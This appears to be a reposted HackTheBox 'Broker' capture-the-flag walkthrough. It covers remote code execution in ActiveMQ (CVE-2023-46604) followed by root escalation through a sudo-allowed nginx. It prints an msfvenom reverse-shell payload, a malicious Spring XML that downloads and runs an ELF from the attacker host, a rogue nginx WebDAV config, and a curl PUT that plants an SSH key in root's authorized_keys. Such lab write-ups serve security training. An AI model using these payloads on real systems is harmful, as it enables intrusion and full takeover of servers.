HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

admin 2024年1月23日10:51:02评论44 views字数 2888阅读9分37秒阅读模式
  1. ActiveMQ RCE CVE-2023-46604

  2. Nginx malicious configuration file

Nmap

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

ActiveMQ

admin / admin

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

Do some vuln recon,find https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

https://github.com/X1r0z/ActiveMQ-RCE

Foothold

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT 6666 -f elf -o test.elf
Edit the poc-linux.xml
1 <?xml version="1.0" encoding="UTF-8" ?>2     <beans xmlns="http://www.springframework.org/schema/beans"        3        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  4        xsi:schemaLocation="  5      http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  6         <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    7             <constructor-arg >      8             <list>        9                 <value>sh</value>        10                 <value>-c</value>        11                 <value>curl -s -o test.elf http://10.10.14.6:8888/test.elf; chmod +x ./test.elf; ./test.elf</value>        12                 <!-- <value>bash</value>        13                 <value>-c</value>        14                 <value>touch /tmp/success</value> -->        15             </list>      16             </constructor-arg>    17         </bean>  18     </beans>

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.14.6:8888/poc.xml
_ _ _ __ __ ___ ____ ____ _____
/ ___| |_(_)_ _____| / |/ _ | _ / ___| ____|
/ _ / __| __| / / _ |/| | | | |_____| |_) | | | _|
/ ___ (__| |_| | V / __/ | | | |_| |_____| _ <| |___| |___
/_/ ____|__|_| _/ ___|_| |_|___ |_| _\____|_____|

[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.14.6:8888/poc.xml

[*] Sending packet: 000000711f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001e687474703a2f2f31302e31302e31342e363a383838382f706f632e786d6

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

in /homewe find uset.xt

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

Privilege Escalation

sudo -l

sudo -lMatching Defaults entries for activemq on broker:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,    use_ptyUser activemq may run the following commands on broker:    (ALL : ALL) NOPASSWD: /usr/sbin/nginx

use the ngx_http_dav_moudle to wirte public SSH key into the root use's authorized_keys

https://github.com/advisories/GHSA-w7p3-hmmp-qmx6

An issue was discovered in Zimbra Collaboration (ZCS) 8.8.x and 9.x (e.g., 8.8.15). The Sudo configuration permits the zimbra user to execute the NGINX binary as root with arbitrary parameters. As part of its intended functionality, NGINX can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.

create the malicious nginx configuration file

user root;worker_processes 4;pid /tmp/nginx.pid;events {        worker_connections 768;}http {      server{              listen 1337;              root /;              autoindex on;              dav_methods PUT;  }}
sudo nginx -c /tmp/pwn.conf
  • use root; worker processed will be run by root.

  • root /; The document root will be topmost directory of the filesystem.

  • dav_methods PUT;Enable the WebDAV HTTP extension with the PUT method,so that we can upload files to the sever.

use ssto check the open ports.

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

Then,writing our public SSH to /root/.ssh/authorized_keys

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

The use curl to send the PUT (-X) request that will write the file.

curl -X PUT localhost:1337/root/.ssh/authorized_keys -d "$(cat root.pub)"ssh -i root root@localhost

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

原文始发于微信公众号(红蓝安全):HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月23日10:51:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-Broker(ActiveMQ RCE CVE-2023-46604)https://cn-sec.com/archives/2420499.html

发表评论

匿名网友 填写信息